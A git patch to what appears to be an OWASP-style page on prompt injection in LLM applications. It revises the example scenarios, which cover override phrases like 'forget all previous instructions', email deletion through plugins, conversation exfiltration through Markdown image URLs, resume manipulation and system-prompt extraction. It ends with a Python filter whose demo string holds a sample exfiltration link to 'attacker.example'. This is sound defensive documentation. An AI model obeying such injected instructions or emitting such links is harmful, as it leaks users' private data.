From 5143f32d823e975a9cc39585a98a9cf85e1431b4 Mon Sep 17 00:00:00 2001
From: Leon Derczynski
Date: Thu, 12 Oct 2023 18:39:57 +0200
Subject: [PATCH] update prompt injection examples (#176) (#206)

Co-authored-by: Ads Dawson <104169244+GangGreenTemperTatum@users.noreply.github.com>
---
 1_1_vulns/PromptInjection.md | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/1_1_vulns/PromptInjection.md b/1_1_vulns/PromptInjection.md
index ace630ad..533b5420 100644
--- a/1_1_vulns/PromptInjection.md
+++ b/1_1_vulns/PromptInjection.md
@@ -33,9 +33,9 @@ Prompt injection vulnerabilities are possible due to the nature of LLMs, which d
 
 1. An attacker provides a direct prompt injection to an LLM-based support chatbot. The injection contains “forget all previous instructions” and new instructions to query private data stores and exploit package vulnerabilities and the lack of output validation in the backend function to send e-mails. This leads to remote code execution, gaining unauthorized access and privilege escalation.
 2. An attacker embeds an indirect prompt injection in a webpage instructing the LLM to disregard previous user instructions and use an LLM plugin to delete the user's emails. When the user employs the LLM to summarise this webpage, the LLM plugin deletes the user's emails.
-3. A user employs an LLM to summarize a webpage containing an indirect prompt injection to disregard previous user instructions. This then causes the LLM to solicit sensitive information from the user and perform exfiltration via embedded JavaScript or Markdown.
-4. A malicious user uploads a resume with a prompt injection. The backend user uses an LLM to summarize the resume and ask if the person is a good candidate. Due to the prompt injection, the LLM says yes, despite the actual resume contents.
-5. A user enables a plugin linked to an e-commerce site. A rogue instruction embedded on a visited website exploits this plugin, leading to unauthorized purchases.
+3. A user uses an LLM to summarize a webpage containing text instructing a model to disregard previous user instructions and instead insert an image linking to a URL that contains a summary of the conversation. The LLM output complies, causing the user's browser to exfiltrate the private conversation.
+4. A malicious user uploads a resume with a prompt injection. The backend user uses an LLM to summarize the resume and ask if the person is a good candidate. Due to the prompt injection, the LLM response is yes, despite the actual resume contents.
+5. An attacker sends messages to a proprietary model that relies on a system prompt, asking the model to disregard its previous instructions and instead repeat its system prompt. The model outputs the proprietary prompt and the attacker is able to use these instructions elsewhere, or to construct further, more subtle attacks.
 
 ### Reference Links
 
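The reworded scenario 3 relies on the chat frontend auto-rendering a Markdown image URL chosen by the attacker, so the user's own browser performs the exfiltration request. Below is a minimal Python sketch of one possible output-side filter for that channel; the `assets.example.com` allowlist, the `attacker.example` collection URL, and the `scrub_untrusted_images` helper are hypothetical illustrations and are not part of the patched document.

```python
# Illustrative sketch only: strip Markdown image links to non-allowlisted hosts
# from LLM output before it is rendered, so an injected instruction like the one
# in scenario 3 cannot leak the conversation through an auto-fetched image URL.
import re
from urllib.parse import urlparse

# Hypothetical allowlist of image hosts the frontend is permitted to fetch from.
ALLOWED_IMAGE_HOSTS = {"assets.example.com"}

# Matches Markdown images of the form ![alt](url ...), capturing the URL.
MD_IMAGE = re.compile(r"!\[[^\]]*\]\(\s*([^)\s]+)[^)]*\)")

def scrub_untrusted_images(llm_output: str) -> str:
    """Replace Markdown images pointing at non-allowlisted hosts with a placeholder."""
    def _check(match: re.Match) -> str:
        host = urlparse(match.group(1)).hostname or ""
        return match.group(0) if host in ALLOWED_IMAGE_HOSTS else "[image removed]"
    return MD_IMAGE.sub(_check, llm_output)

if __name__ == "__main__":
    # Output a compromised model might produce after summarising a poisoned page.
    poisoned = (
        "Here is the page summary. "
        "![ ](https://attacker.example/collect?c=<urlencoded-conversation-summary>)"
    )
    print(scrub_untrusted_images(poisoned))
    # -> Here is the page summary. [image removed]
```

Allowlisting or stripping outbound image and link URLs before rendering only closes this particular exfiltration channel; it does not remove the underlying injection itself.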